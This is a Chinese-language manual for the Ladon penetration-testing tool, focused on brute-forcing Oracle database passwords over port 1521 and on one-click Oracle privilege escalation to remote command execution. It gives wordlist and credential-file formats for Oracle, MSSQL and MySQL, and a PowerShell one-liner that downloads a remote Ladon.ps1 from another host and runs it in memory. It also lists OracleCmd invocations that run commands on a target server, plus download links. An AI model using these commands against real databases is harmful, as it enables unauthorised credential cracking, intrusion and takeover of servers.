Ladon渗透Oracle数据库提权 密码爆破

<%

Ladon

1521端口 Oracle数据库密码爆破

Oracle不同于MS SQL Server和Mysql数据库,可对用户配置权限
数据库名不对,是无法连接上数据库的,比方说你获取到的密码
是oracle admin123 只允许连接db888数据库 就是所说的SID
但是网上很多工具都是使用默认的orcl数据库 导致无法爆破
有可能会因此错过很多Oracle数据库机器权限

PS:SQL Server不指定数据库名也可以连 权限不够最多读取不了对应库的数据而已
但是填写默认的master库,即使是最低权限,也可连接上,就可用来验证爆破密码
而Oracle不行,填写默认的orcl,非授权用户是连不上的 不指定时Ladon默认跑orcl

1
Ladon 192.168.1.8/24 OracleScan

image

配置密码爆破参数

1 支持标准的user.txt和pass.txt帐密破解,爆破每个用户都需将密码跑完或跑出正确为此
2 支持userpass.txt(存放用户名和对应密码),用于快速验证其它机器是否存在相同帐密
3 支持check.txt(存放IP/端口/库名/用户/密码),不指定端口和数据库名则使用默认
4 Oracle数据库,需要放个sid.txt里面存放数据库名称,Ladon先检测数据库存在才爆破

user.txt和pass.txt分别存放用户、密码
userpass.txt存放用户密码组,即每行存放用户以及密码
check.txt每行存放IP\端口\用户\密码

数据库口令检测

数据库与其它密码爆破不同,有时数据库做了权限,指定用户只能连指定库,连默认库肯定不行

mssql密码验证

(大型内网可能从其它机器收集到大量机器密码,第一步肯定是先验证)
非默认端口请将以下端口改成被修改端口即可,单个IP可直接Ladon IP:端口 MssqlScan扫描
check.txt
192.168.1.8 1433 master sa k8gege
192.168.1.8 sa k8gege
192.168.1.8 1433 sa k8gege
命令: Ladon MssqlScan

oracle同理

192.168.1.8 1521 orcl system k8gege
192.168.1.8 orcl system k8gege
192.168.1.8 system k8gege
命令: Ladon OracleScan

mysql无需指定数据库名

192.168.1.8 3306 root k8gege
192.168.1.8 root k8gege
命令: Ladon MysqlScan

PowerLadon

远程加载OracleScan 1521端口弱口令爆破

powershell “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.1.3:800/Ladon.ps1'); Ladon 192.168.1.141 OracleScan”

Kali、Linux、Mac、路由器等操作系统

./Ladon 192.168.1.8/24 OracleScan
image

Oracle数据库远程提权工具

12.15
[+]OracleCmd2 Oracle数据库远程提权工具2 官方驱动>=net 4.8 大小4.9M不内置

Ladon 12.2 12.14
[+]OracleCmd Oracle数据库远程提权工具 3种方法一键提权
支持Windows/Linux/MacOS等服务器操作系统
支持高版本Oracle 12G、11G、12G及之前版本

GUI版 填写用户密码 Oracle一键提权远程执行命令
image

1
2
3
4
5
Ladon OracleCmd 192.168.50.18 1521 orcl admin K8gege520 m3 whoami
Ladon OracleCmd 192.168.50.18 1521 orcl admin K8gege520 m2 whoami
Ladon OracleCmd 192.168.50.18 1521 orcl admin K8gege520 m1 whoami

Ladon OracleCmd2 192.168.50.18 1521 orcl admin K8gege520 whoami

image

image

工具下载

最新版本:https://k8gege.org/Download
历史版本: https://github.com/k8gege/Ladon/releases